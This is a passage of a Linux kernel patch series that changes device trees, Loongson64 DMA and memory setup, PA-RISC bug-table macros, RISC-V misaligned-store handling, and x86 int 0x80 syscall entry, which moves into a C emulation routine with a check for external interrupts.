+ 		interrupt-controller;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index ef2764a595eda..414cbe3451270 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -471,6 +471,8 @@
+ 
+ 					power-domain@MT8195_POWER_DOMAIN_VENC_CORE1 {
+ 						reg = <MT8195_POWER_DOMAIN_VENC_CORE1>;
++						clocks = <&vencsys_core1 CLK_VENC_CORE1_LARB>;
++						clock-names = "venc1-larb";
+ 						mediatek,infracfg = <&infracfg_ao>;
+ 						#power-domain-cells = <0>;
+ 					};
+@@ -533,6 +535,8 @@
+ 
+ 						power-domain@MT8195_POWER_DOMAIN_VENC {
+ 							reg = <MT8195_POWER_DOMAIN_VENC>;
++							clocks = <&vencsys CLK_VENC_LARB>;
++							clock-names = "venc0-larb";
+ 							mediatek,infracfg = <&infracfg_ao>;
+ 							#power-domain-cells = <0>;
+ 						};
+@@ -1985,7 +1989,7 @@
+ 			reg = <0 0x1b010000 0 0x1000>;
+ 			mediatek,larb-id = <20>;
+ 			mediatek,smi = <&smi_common_vpp>;
+-			clocks = <&vencsys_core1 CLK_VENC_CORE1_LARB>,
++			clocks = <&vencsys_core1 CLK_VENC_CORE1_VENC>,
+ 				 <&vencsys_core1 CLK_VENC_CORE1_GALS>,
+ 				 <&vppsys0 CLK_VPP0_GALS_VDO0_VDO1_VENCSYS_CORE1>;
+ 			clock-names = "apb", "smi", "gals";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328.dtsi b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+index 49ae15708a0b6..905a50aa5dc38 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+@@ -666,7 +666,7 @@
+ 
+ 	vdec: video-codec@ff360000 {
+ 		compatible = "rockchip,rk3328-vdec", "rockchip,rk3399-vdec";
+-		reg = <0x0 0xff360000 0x0 0x400>;
++		reg = <0x0 0xff360000 0x0 0x480>;
+ 		interrupts = <GIC_SPI 7 IRQ_TYPE_LEVEL_HIGH>;
+ 		clocks = <&cru ACLK_RKVDEC>, <&cru HCLK_RKVDEC>,
+ 			 <&cru SCLK_VDEC_CABAC>, <&cru SCLK_VDEC_CORE>;
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399.dtsi b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+index 5f3caf01badeb..a7e6eccb14cc6 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+@@ -1062,7 +1062,9 @@
+ 			power-domain@RK3399_PD_VDU {
+ 				reg = <RK3399_PD_VDU>;
+ 				clocks = <&cru ACLK_VDU>,
+-					 <&cru HCLK_VDU>;
++					 <&cru HCLK_VDU>,
++					 <&cru SCLK_VDU_CA>,
++					 <&cru SCLK_VDU_CORE>;
+ 				pm_qos = <&qos_video_m1_r>,
+ 					 <&qos_video_m1_w>;
+ 				#power-domain-cells = <0>;
+@@ -1338,7 +1340,7 @@
+ 
+ 	vdec: video-codec@ff660000 {
+ 		compatible = "rockchip,rk3399-vdec";
+-		reg = <0x0 0xff660000 0x0 0x400>;
++		reg = <0x0 0xff660000 0x0 0x480>;
+ 		interrupts = <GIC_SPI 116 IRQ_TYPE_LEVEL_HIGH 0>;
+ 		clocks = <&cru ACLK_VDU>, <&cru HCLK_VDU>,
+ 			 <&cru SCLK_VDU_CA>, <&cru SCLK_VDU_CORE>;
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index 82b4402810da0..40ed49d9adff5 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -796,8 +796,6 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 
+ 	/* function return */
+ 	case BPF_JMP | BPF_EXIT:
+-		emit_sext_32(ctx, regmap[BPF_REG_0], true);
+-
+ 		if (i == ctx->prog->len - 1)
+ 			break;
+ 
+@@ -844,14 +842,8 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 			}
+ 			break;
+ 		case BPF_DW:
+-			if (is_signed_imm12(off)) {
+-				emit_insn(ctx, ldd, dst, src, off);
+-			} else if (is_signed_imm14(off)) {
+-				emit_insn(ctx, ldptrd, dst, src, off);
+-			} else {
+-				move_imm(ctx, t1, off, is32);
+-				emit_insn(ctx, ldxd, dst, src, t1);
+-			}
++			move_imm(ctx, t1, off, is32);
++			emit_insn(ctx, ldxd, dst, src, t1);
+ 			break;
+ 		}
+ 		break;
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index 0e62f5edaee2e..585783c9907ef 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -483,6 +483,7 @@ config MACH_LOONGSON2EF
+ 
+ config MACH_LOONGSON64
+ 	bool "Loongson 64-bit family of machines"
++	select ARCH_DMA_DEFAULT_COHERENT
+ 	select ARCH_SPARSEMEM_ENABLE
+ 	select ARCH_MIGHT_HAVE_PC_PARPORT
+ 	select ARCH_MIGHT_HAVE_PC_SERIO
+@@ -1304,6 +1305,7 @@ config CPU_LOONGSON64
+ 	select CPU_SUPPORTS_MSA
+ 	select CPU_DIEI_BROKEN if !LOONGSON3_ENHANCEMENT
+ 	select CPU_MIPSR2_IRQ_VI
++	select DMA_NONCOHERENT
+ 	select WEAK_ORDERING
+ 	select WEAK_REORDERING_BEYOND_LLSC
+ 	select MIPS_ASID_BITS_VARIABLE
+diff --git a/arch/mips/include/asm/mach-loongson64/boot_param.h b/arch/mips/include/asm/mach-loongson64/boot_param.h
+index 035b1a69e2d00..e007edd6b60a7 100644
+--- a/arch/mips/include/asm/mach-loongson64/boot_param.h
++++ b/arch/mips/include/asm/mach-loongson64/boot_param.h
+@@ -14,7 +14,11 @@
+ #define ADAPTER_ROM		8
+ #define ACPI_TABLE		9
+ #define SMBIOS_TABLE		10
+-#define MAX_MEMORY_TYPE		11
++#define UMA_VIDEO_RAM		11
++#define VUMA_VIDEO_RAM		12
++#define MAX_MEMORY_TYPE		13
++
++#define MEM_SIZE_IS_IN_BYTES	(1 << 31)
+ 
+ #define LOONGSON3_BOOT_MEM_MAP_MAX 128
+ struct efi_memory_map_loongson {
+@@ -117,7 +121,8 @@ struct irq_source_routing_table {
+ 	u64 pci_io_start_addr;
+ 	u64 pci_io_end_addr;
+ 	u64 pci_config_addr;
+-	u32 dma_mask_bits;
++	u16 dma_mask_bits;
++	u16 dma_noncoherent;
+ } __packed;
+ 
+ struct interface_info {
+diff --git a/arch/mips/kernel/process.c b/arch/mips/kernel/process.c
+index bbe9ce471791e..17d80e2f2e4cb 100644
+--- a/arch/mips/kernel/process.c
++++ b/arch/mips/kernel/process.c
+@@ -121,6 +121,19 @@ int copy_thread(struct task_struct *p, const struct kernel_clone_args *args)
+ 	/*  Put the stack after the struct pt_regs.  */
+ 	childksp = (unsigned long) childregs;
+ 	p->thread.cp0_status = (read_c0_status() & ~(ST0_CU2|ST0_CU1)) | ST0_KERNEL_CUMASK;
++
++	/*
++	 * New tasks lose permission to use the fpu. This accelerates context
++	 * switching for most programs since they don't use the fpu.
++	 */
++	clear_tsk_thread_flag(p, TIF_USEDFPU);
++	clear_tsk_thread_flag(p, TIF_USEDMSA);
++	clear_tsk_thread_flag(p, TIF_MSA_CTX_LIVE);
++
++#ifdef CONFIG_MIPS_MT_FPAFF
++	clear_tsk_thread_flag(p, TIF_FPUBOUND);
++#endif /* CONFIG_MIPS_MT_FPAFF */
++
+ 	if (unlikely(args->fn)) {
+ 		/* kernel thread */
+ 		unsigned long status = p->thread.cp0_status;
+@@ -149,20 +162,8 @@ int copy_thread(struct task_struct *p, const struct kernel_clone_args *args)
+ 	p->thread.reg29 = (unsigned long) childregs;
+ 	p->thread.reg31 = (unsigned long) ret_from_fork;
+ 
+-	/*
+-	 * New tasks lose permission to use the fpu. This accelerates context
+-	 * switching for most programs since they don't use the fpu.
+-	 */
+ 	childregs->cp0_status &= ~(ST0_CU2|ST0_CU1);
+ 
+-	clear_tsk_thread_flag(p, TIF_USEDFPU);
+-	clear_tsk_thread_flag(p, TIF_USEDMSA);
+-	clear_tsk_thread_flag(p, TIF_MSA_CTX_LIVE);
+-
+-#ifdef CONFIG_MIPS_MT_FPAFF
+-	clear_tsk_thread_flag(p, TIF_FPUBOUND);
+-#endif /* CONFIG_MIPS_MT_FPAFF */
+-
+ #ifdef CONFIG_MIPS_FP_SUPPORT
+ 	atomic_set(&p->thread.bd_emu_frame, BD_EMUFRAME_NONE);
+ #endif
+diff --git a/arch/mips/loongson64/env.c b/arch/mips/loongson64/env.c
+index c961e2999f15a..ef3750a6ffacf 100644
+--- a/arch/mips/loongson64/env.c
++++ b/arch/mips/loongson64/env.c
+@@ -13,6 +13,8 @@
+  * Copyright (C) 2009 Lemote Inc.
+  * Author: Wu Zhangjin, wuzhangjin@gmail.com
+  */
++
++#include <linux/dma-map-ops.h>
+ #include <linux/export.h>
+ #include <linux/pci_ids.h>
+ #include <asm/bootinfo.h>
+@@ -147,8 +149,14 @@ void __init prom_lefi_init_env(void)
+ 
+ 	loongson_sysconf.dma_mask_bits = eirq_source->dma_mask_bits;
+ 	if (loongson_sysconf.dma_mask_bits < 32 ||
+-		loongson_sysconf.dma_mask_bits > 64)
++			loongson_sysconf.dma_mask_bits > 64) {
+ 		loongson_sysconf.dma_mask_bits = 32;
++		dma_default_coherent = true;
++	} else {
++		dma_default_coherent = !eirq_source->dma_noncoherent;
++	}
++
++	pr_info("Firmware: Coherent DMA: %s\n", dma_default_coherent ? "on" : "off");
+ 
+ 	loongson_sysconf.restart_addr = boot_p->reset_system.ResetWarm;
+ 	loongson_sysconf.poweroff_addr = boot_p->reset_system.Shutdown;
+diff --git a/arch/mips/loongson64/init.c b/arch/mips/loongson64/init.c
+index ee8de1735b7c0..f25caa6aa9d30 100644
+--- a/arch/mips/loongson64/init.c
++++ b/arch/mips/loongson64/init.c
+@@ -49,8 +49,7 @@ void virtual_early_config(void)
+ void __init szmem(unsigned int node)
+ {
+ 	u32 i, mem_type;
+-	static unsigned long num_physpages;
+-	u64 node_id, node_psize, start_pfn, end_pfn, mem_start, mem_size;
++	phys_addr_t node_id, mem_start, mem_size;
+ 
+ 	/* Otherwise come from DTB */
+ 	if (loongson_sysconf.fw_interface != LOONGSON_LEFI)
+@@ -64,30 +63,46 @@ void __init szmem(unsigned int node)
+ 
+ 		mem_type = loongson_memmap->map[i].mem_type;
+ 		mem_size = loongson_memmap->map[i].mem_size;
+-		mem_start = loongson_memmap->map[i].mem_start;
++
++		/* Memory size comes in MB if MEM_SIZE_IS_IN_BYTES not set */
++		if (mem_size & MEM_SIZE_IS_IN_BYTES)
++			mem_size &= ~MEM_SIZE_IS_IN_BYTES;
++		else
++			mem_size = mem_size << 20;
++
++		mem_start = (node_id << 44) | loongson_memmap->map[i].mem_start;
+ 
+ 		switch (mem_type) {
+ 		case SYSTEM_RAM_LOW:
+ 		case SYSTEM_RAM_HIGH:
+-			start_pfn = ((node_id << 44) + mem_start) >> PAGE_SHIFT;
+-			node_psize = (mem_size << 20) >> PAGE_SHIFT;
+-			end_pfn  = start_pfn + node_psize;
+-			num_physpages += node_psize;
+-			pr_info("Node%d: mem_type:%d, mem_start:0x%llx, mem_size:0x%llx MB\n",
+-				(u32)node_id, mem_type, mem_start, mem_size);
+-			pr_info("       start_pfn:0x%llx, end_pfn:0x%llx, num_physpages:0x%lx\n",
+-				start_pfn, end_pfn, num_physpages);
+-			memblock_add_node(PFN_PHYS(start_pfn),
+-					  PFN_PHYS(node_psize), node,
++		case UMA_VIDEO_RAM:
++			pr_info("Node %d, mem_type:%d\t[%pa], %pa bytes usable\n",
++				(u32)node_id, mem_type, &mem_start, &mem_size);
++			memblock_add_node(mem_start, mem_size, node,
+ 					  MEMBLOCK_NONE);
+ 			break;
+ 		case SYSTEM_RAM_RESERVED:
+-			pr_info("Node%d: mem_type:%d, mem_start:0x%llx, mem_size:0x%llx MB\n",
+-				(u32)node_id, mem_type, mem_start, mem_size);
+-			memblock_reserve(((node_id << 44) + mem_start), mem_size << 20);
++		case VIDEO_ROM:
++		case ADAPTER_ROM:
++		case ACPI_TABLE:
++		case SMBIOS_TABLE:
++			pr_info("Node %d, mem_type:%d\t[%pa], %pa bytes reserved\n",
++				(u32)node_id, mem_type, &mem_start, &mem_size);
++			memblock_reserve(mem_start, mem_size);
++			break;
++		/* We should not reserve VUMA_VIDEO_RAM as it overlaps with MMIO */
++		case VUMA_VIDEO_RAM:
++		default:
++			pr_info("Node %d, mem_type:%d\t[%pa], %pa bytes unhandled\n",
++				(u32)node_id, mem_type, &mem_start, &mem_size);
+ 			break;
+ 		}
+ 	}
++
++	/* Reserve vgabios if it comes from firmware */
++	if (loongson_sysconf.vgabios_addr)
++		memblock_reserve(virt_to_phys((void *)loongson_sysconf.vgabios_addr),
++				SZ_256K);
+ }
+ 
+ #ifndef CONFIG_NUMA
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index 67c26e81e2150..345d5e021484c 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -105,9 +105,12 @@ config ARCH_HAS_ILOG2_U64
+ 	default n
+ 
+ config GENERIC_BUG
+-	bool
+-	default y
++	def_bool y
+ 	depends on BUG
++	select GENERIC_BUG_RELATIVE_POINTERS if 64BIT
++
++config GENERIC_BUG_RELATIVE_POINTERS
++	bool
+ 
+ config GENERIC_HWEIGHT
+ 	bool
+diff --git a/arch/parisc/include/asm/bug.h b/arch/parisc/include/asm/bug.h
+index b9cad0bb4461b..833555f74ffa7 100644
+--- a/arch/parisc/include/asm/bug.h
++++ b/arch/parisc/include/asm/bug.h
+@@ -17,26 +17,27 @@
+ #define	PARISC_BUG_BREAK_ASM	"break 0x1f, 0x1fff"
+ #define	PARISC_BUG_BREAK_INSN	0x03ffe01f  /* PARISC_BUG_BREAK_ASM */
+ 
+-#if defined(CONFIG_64BIT)
+-#define ASM_WORD_INSN		".dword\t"
++#ifdef CONFIG_GENERIC_BUG_RELATIVE_POINTERS
++# define __BUG_REL(val) ".word " __stringify(val) " - ."
+ #else
+-#define ASM_WORD_INSN		".word\t"
++# define __BUG_REL(val) ".word " __stringify(val)
+ #endif
+ 
++
+ #ifdef CONFIG_DEBUG_BUGVERBOSE
+ #define BUG()								\
+ 	do {								\
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+ 			     "\t.pushsection __bug_table,\"a\"\n"	\
+-			     "\t.align %4\n"				\
+-			     "2:\t" ASM_WORD_INSN "1b, %c0\n"		\
++			     "\t.align 4\n"				\
++			     "2:\t" __BUG_REL(1b) "\n"			\
++			     "\t" __BUG_REL(%c0)  "\n"			\
+ 			     "\t.short %1, %2\n"			\
+-			     "\t.blockz %3-2*%4-2*2\n"			\
++			     "\t.blockz %3-2*4-2*2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (__FILE__), "i" (__LINE__),	\
+-			     "i" (0), "i" (sizeof(struct bug_entry)),	\
+-			     "i" (sizeof(long)) );			\
++			     "i" (0), "i" (sizeof(struct bug_entry)) );	\
+ 		unreachable();						\
+ 	} while(0)
+ 
+@@ -54,15 +55,15 @@
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+ 			     "\t.pushsection __bug_table,\"a\"\n"	\
+-			     "\t.align %4\n"				\
+-			     "2:\t" ASM_WORD_INSN "1b, %c0\n"		\
++			     "\t.align 4\n"				\
++			     "2:\t" __BUG_REL(1b) "\n"			\
++			     "\t" __BUG_REL(%c0)  "\n"			\
+ 			     "\t.short %1, %2\n"			\
+-			     "\t.blockz %3-2*%4-2*2\n"			\
++			     "\t.blockz %3-2*4-2*2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (__FILE__), "i" (__LINE__),	\
+ 			     "i" (BUGFLAG_WARNING|(flags)),		\
+-			     "i" (sizeof(struct bug_entry)),		\
+-			     "i" (sizeof(long)) );			\
++			     "i" (sizeof(struct bug_entry)) );		\
+ 	} while(0)
+ #else
+ #define __WARN_FLAGS(flags)						\
+@@ -70,14 +71,13 @@
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+ 			     "\t.pushsection __bug_table,\"a\"\n"	\
+-			     "\t.align %2\n"				\
+-			     "2:\t" ASM_WORD_INSN "1b\n"		\
++			     "\t.align 4\n"				\
++			     "2:\t" __BUG_REL(1b) "\n"			\
+ 			     "\t.short %0\n"				\
+-			     "\t.blockz %1-%2-2\n"			\
++			     "\t.blockz %1-4-2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (BUGFLAG_WARNING|(flags)),		\
+-			     "i" (sizeof(struct bug_entry)),		\
+-			     "i" (sizeof(long)) );			\
++			     "i" (sizeof(struct bug_entry)) );		\
+ 	} while(0)
+ #endif
+ 
+diff --git a/arch/riscv/Kconfig.socs b/arch/riscv/Kconfig.socs
+index 69774bb362d6a..29d78eefc8894 100644
+--- a/arch/riscv/Kconfig.socs
++++ b/arch/riscv/Kconfig.socs
+@@ -23,6 +23,7 @@ config SOC_STARFIVE
+ 	select PINCTRL
+ 	select RESET_CONTROLLER
+ 	select SIFIVE_PLIC
++	select ARM_AMBA
+ 	help
+ 	  This enables support for StarFive SoC platform hardware.
+ 
+diff --git a/arch/riscv/kernel/traps_misaligned.c b/arch/riscv/kernel/traps_misaligned.c
+index 378f5b1514435..5348d842c7453 100644
+--- a/arch/riscv/kernel/traps_misaligned.c
++++ b/arch/riscv/kernel/traps_misaligned.c
+@@ -342,16 +342,14 @@ int handle_misaligned_store(struct pt_regs *regs)
+ 	} else if ((insn & INSN_MASK_C_SD) == INSN_MATCH_C_SD) {
+ 		len = 8;
+ 		val.data_ulong = GET_RS2S(insn, regs);
+-	} else if ((insn & INSN_MASK_C_SDSP) == INSN_MATCH_C_SDSP &&
+-		   ((insn >> SH_RD) & 0x1f)) {
++	} else if ((insn & INSN_MASK_C_SDSP) == INSN_MATCH_C_SDSP) {
+ 		len = 8;
+ 		val.data_ulong = GET_RS2C(insn, regs);
+ #endif
+ 	} else if ((insn & INSN_MASK_C_SW) == INSN_MATCH_C_SW) {
+ 		len = 4;
+ 		val.data_ulong = GET_RS2S(insn, regs);
+-	} else if ((insn & INSN_MASK_C_SWSP) == INSN_MATCH_C_SWSP &&
+-		   ((insn >> SH_RD) & 0x1f)) {
++	} else if ((insn & INSN_MASK_C_SWSP) == INSN_MATCH_C_SWSP) {
+ 		len = 4;
+ 		val.data_ulong = GET_RS2C(insn, regs);
+ 	} else {
+diff --git a/arch/s390/mm/pgtable.c b/arch/s390/mm/pgtable.c
+index 4909dcd762e8c..9977d637f836d 100644
+--- a/arch/s390/mm/pgtable.c
++++ b/arch/s390/mm/pgtable.c
+@@ -731,7 +731,7 @@ void ptep_zap_unused(struct mm_struct *mm, unsigned long addr,
+ 		pte_clear(mm, addr, ptep);
+ 	}
+ 	if (reset)
+-		pgste_val(pgste) &= ~_PGSTE_GPS_USAGE_MASK;
++		pgste_val(pgste) &= ~(_PGSTE_GPS_USAGE_MASK | _PGSTE_GPS_NODAT);
+ 	pgste_set_unlock(ptep, pgste);
+ 	preempt_enable();
+ }
+diff --git a/arch/x86/coco/tdx/tdx.c b/arch/x86/coco/tdx/tdx.c
+index 8a1d48b8c2a3e..d0565a9e7d8c9 100644
+--- a/arch/x86/coco/tdx/tdx.c
++++ b/arch/x86/coco/tdx/tdx.c
+@@ -8,6 +8,7 @@
+ #include <asm/coco.h>
+ #include <asm/tdx.h>
+ #include <asm/vmx.h>
++#include <asm/ia32.h>
+ #include <asm/insn.h>
+ #include <asm/insn-eval.h>
+ #include <asm/pgtable.h>
+diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
+index 93c60c0c9d4a7..9c0b26ae51069 100644
+--- a/arch/x86/entry/common.c
++++ b/arch/x86/entry/common.c
+@@ -25,6 +25,7 @@
+ #include <xen/events.h>
+ #endif
+ 
++#include <asm/apic.h>
+ #include <asm/desc.h>
+ #include <asm/traps.h>
+ #include <asm/vdso.h>
+@@ -96,6 +97,10 @@ static __always_inline int syscall_32_enter(struct pt_regs *regs)
+ 	return (int)regs->orig_ax;
+ }
+ 
++#ifdef CONFIG_IA32_EMULATION
++bool __ia32_enabled __ro_after_init = true;
++#endif
++
+ /*
+  * Invoke a 32-bit syscall.  Called with IRQs on in CONTEXT_KERNEL.
+  */
+@@ -115,7 +120,96 @@ static __always_inline void do_syscall_32_irqs_on(struct pt_regs *regs, int nr)
+ 	}
+ }
+ 
+-/* Handles int $0x80 */
++#ifdef CONFIG_IA32_EMULATION
++static __always_inline bool int80_is_external(void)
++{
++	const unsigned int offs = (0x80 / 32) * 0x10;
++	const u32 bit = BIT(0x80 % 32);
++
++	/* The local APIC on XENPV guests is fake */
++	if (cpu_feature_enabled(X86_FEATURE_XENPV))
++		return false;
++
++	/*
++	 * If vector 0x80 is set in the APIC ISR then this is an external
++	 * interrupt. Either from broken hardware or injected by a VMM.
++	 *
++	 * Note: In guest mode this is only valid for secure guests where
++	 * the secure module fully controls the vAPIC exposed to the guest.
++	 */
++	return apic_read(APIC_ISR + offs) & bit;
++}
++
++/**
++ * int80_emulation - 32-bit legacy syscall entry
++ *
++ * This entry point can be used by 32-bit and 64-bit programs to perform
++ * 32-bit system calls.  Instances of INT $0x80 can be found inline in
++ * various programs and libraries.  It is also used by the vDSO's
++ * __kernel_vsyscall fallback for hardware that doesn't support a faster
++ * entry method.  Restarted 32-bit system calls also fall back to INT
++ * $0x80 regardless of what instruction was originally used to do the
++ * system call.
++ *
++ * This is considered a slow path.  It is not used by most libc
++ * implementations on modern hardware except during process startup.
++ *
++ * The arguments for the INT $0x80 based syscall are on stack in the
++ * pt_regs structure:
++ *   eax:				system call number
++ *   ebx, ecx, edx, esi, edi, ebp:	arg1 - arg 6
++ */
++DEFINE_IDTENTRY_RAW(int80_emulation)
++{
++	int nr;
++
++	/* Kernel does not use INT $0x80! */
++	if (unlikely(!user_mode(regs))) {
++		irqentry_enter(regs);
++		instrumentation_begin();
++		panic("Unexpected external interrupt 0x80\n");
++	}
++
++	/*
++	 * Establish kernel context for instrumentation, including for
++	 * int80_is_external() below which calls into the APIC driver.
++	 * Identical for soft and external interrupts.
++	 */
++	enter_from_user_mode(regs);
++
++	instrumentation_begin();
++	add_random_kstack_offset();
++
++	/* Validate that this is a soft interrupt to the extent possible */
++	if (unlikely(int80_is_external()))
++		panic("Unexpected external interrupt 0x80\n");
++
++	/*
++	 * The low level idtentry code pushed -1 into regs::orig_ax
++	 * and regs::ax contains the syscall number.
++	 *
++	 * User tracing code (ptrace or signal handlers) might assume
++	 * that the regs::orig_ax contains a 32-bit number on invoking
++	 * a 32-bit syscall.
++	 *
++	 * Establish the syscall convention by saving the 32bit truncated
++	 * syscall number in regs::orig_ax and by invalidating regs::ax.
++	 */
++	regs->orig_ax = regs->ax & GENMASK(31, 0);
++	regs->ax = -ENOSYS;
++
++	nr = syscall_32_enter(regs);
++
++	local_irq_enable();
++	nr = syscall_enter_from_user_mode_work(regs, nr);
++	do_syscall_32_irqs_on(regs, nr);
++
++	instrumentation_end();
++	syscall_exit_to_user_mode(regs);
++}
++#else /* CONFIG_IA32_EMULATION */
++
++/* Handles int $0x80 on a 32bit kernel */
+ __visible noinstr void do_int80_syscall_32(struct pt_regs *regs)
+ {
+ 	int nr = syscall_32_enter(regs);
+@@ -134,6 +228,7 @@ __visible noinstr void do_int80_syscall_32(struct pt_regs *regs)
+ 	instrumentation_end();
+ 	syscall_exit_to_user_mode(regs);
+ }
++#endif /* !CONFIG_IA32_EMULATION */
+ 
+ static noinstr bool __do_fast_syscall_32(struct pt_regs *regs)
+ {
+diff --git a/arch/x86/entry/entry_64_compat.S b/arch/x86/entry/entry_64_compat.S
+index 4dd19819053a5..d6c08d8986b17 100644
+--- a/arch/x86/entry/entry_64_compat.S
++++ b/arch/x86/entry/entry_64_compat.S
+@@ -277,80 +277,3 @@ SYM_INNER_LABEL(entry_SYSRETL_compat_end, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+ 	int3
+ SYM_CODE_END(entry_SYSCALL_compat)
+-
+-/*
+- * 32-bit legacy system call entry.
+- *
+- * 32-bit x86 Linux system calls traditionally used the INT $0x80
+- * instruction.  INT $0x80 lands here.
+- *
+- * This entry point can be used by 32-bit and 64-bit programs to perform
+- * 32-bit system calls.  Instances of INT $0x80 can be found inline in
+- * various programs and libraries.  It is also used by the vDSO's
+- * __kernel_vsyscall fallback for hardware that doesn't support a faster
+- * entry method.  Restarted 32-bit system calls also fall back to INT
+- * $0x80 regardless of what instruction was originally used to do the
+- * system call.
+- *
+- * This is considered a slow path.  It is not used by most libc
+- * implementations on modern hardware except during process startup.
+- *
+- * Arguments:
+- * eax  system call number
+- * ebx  arg1
+- * ecx  arg2
+- * edx  arg3
+- * esi  arg4
+- * edi  arg5
+- * ebp  arg6
+- */
+-SYM_CODE_START(entry_INT80_compat)
+-	UNWIND_HINT_ENTRY
+-	ENDBR
+-	/*
+-	 * Interrupts are off on entry.
+-	 */
+-	ASM_CLAC			/* Do this early to minimize exposure */
+-	ALTERNATIVE "swapgs", "", X86_FEATURE_XENPV
+-
+-	/*
+-	 * User tracing code (ptrace or signal handlers) might assume that
+-	 * the saved RAX contains a 32-bit number when we're invoking a 32-bit
+-	 * syscall.  Just in case the high bits are nonzero, zero-extend
+-	 * the syscall number.  (This could almost certainly be deleted
+-	 * with no ill effects.)
+-	 */
+-	movl	%eax, %eax
+-
+-	/* switch to thread stack expects orig_ax and rdi to be pushed */
+-	pushq	%rax			/* pt_regs->orig_ax */
+-
+-	/* Need to switch before accessing the thread stack. */
+-	SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
+-
+-	/* In the Xen PV case we already run on the thread stack. */
+-	ALTERNATIVE "", "jmp .Lint80_keep_stack", X86_FEATURE_XENPV
+-
+-	movq	%rsp, %rax
+-	movq	PER_CPU_VAR(cpu_current_top_of_stack), %rsp
+-
+-	pushq	5*8(%rax)		/* regs->ss */
+-	pushq	4*8(%rax)		/* regs->rsp */
+-	pushq	3*8(%rax)		/* regs->eflags */
+-	pushq	2*8(%rax)		/* regs->cs */
+-	pushq	1*8(%rax)		/* regs->ip */
+-	pushq	0*8(%rax)		/* regs->orig_ax */
+-.Lint80_keep_stack:
+-
+-	PUSH_AND_CLEAR_REGS rax=$-ENOSYS
+-	UNWIND_HINT_REGS
+-
+-	cld
+-
+-	IBRS_ENTER
+-	UNTRAIN_RET
+-
+-	movq	%rsp, %rdi
+-	call	do_int80_syscall_32
+-	jmp	swapgs_restore_regs_and_return_to_usermode
+-SYM_CODE_END(entry_INT80_compat)
+diff --git a/arch/x86/include/asm/ia32.h b/arch/x86/include/asm/ia32.h
+index fada857f0a1ed..9805629479d96 100644
+--- a/arch/x86/include/asm/ia32.h
++++ b/arch/x86/include/asm/ia32.h
+@@ -68,6 +68,27 @@ extern void ia32_pick_mmap_layout(struct mm_struct *mm);
+ 
+ #endif
+ 
+-#endif /* CONFIG_IA32_EMULATION */
++extern bool __ia32_enabled;
++
++static inline bool ia32_enabled(void)
++{
++	return __ia32_enabled;
++}
++
++static inline void ia32_disable(void)
++{
++	__ia32_enabled = false;
++}
++
++#else /* !CONFIG_IA32_EMULATION */
++
++static inline bool ia32_enabled(void)
++{
++	return IS_ENABLED(CONFIG_X86_32);
++}
++
++static inline void ia32_disable(void) {}
++
++#endif
+ 
+ #endif /* _ASM_X86_IA32_H */
+diff --git a/arch/x86/include/asm/idtentry.h b/arch/x86/include/asm/idtentry.h
+index 72184b0b2219e..fca710a93eb9c 100644
+--- a/arch/x86/include/asm/idtentry.h
++++ b/arch/x86/include/asm/idtentry.h
+@@ -569,6 +569,10 @@ DECLARE_IDTENTRY_RAW(X86_TRAP_UD,		exc_invalid_op);
+ DECLARE_IDTENTRY_RAW(X86_TRAP_BP,		exc_int3);
+ DECLARE_IDTENTRY_RAW_ERRORCODE(X86_TRAP_PF,	exc_page_fault);
+ 
++#if defined(CONFIG_IA32_EMULATION)
++DECLARE_IDTENTRY_RAW(IA32_SYSCALL_VECTOR,	int80_emulation);
++#endif
++
+ #ifdef CONFIG_X86_MCE
+ #ifdef CONFIG_X86_64
+ DECLARE_IDTENTRY_MCE(X86_TRAP_MC,	exc_machine_check);
+diff --git a/arch/x86/include/asm/proto.h b/arch/x86/include/asm/proto.h
+index 12ef86b19910d..84294b66b9162 100644
+--- a/arch/x86/include/asm/proto.h
++++ b/arch/x86/include/asm/proto.h
+@@ -32,10 +32,6 @@ void entry_SYSCALL_compat(void);
+ void entry_SYSCALL_compat_safe_stack(void);
+ void entry_SYSRETL_compat_unsafe_stack(void);
+ void entry_SYSRETL_compat_end(void);
+-void entry_INT80_compat(void);
+-#ifdef CONFIG_XEN_PV
+-void xen_entry_INT80_compat(void);
+-#endif
+ #endif
+ 
+ void x86_configure_nx(void);
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index b66960358381b..c1d09c8844d67 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -1291,6 +1291,9 @@ static void zenbleed_check_cpu(void *unused)
+ 
+ void amd_check_microcode(void)
+ {
++	if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD)
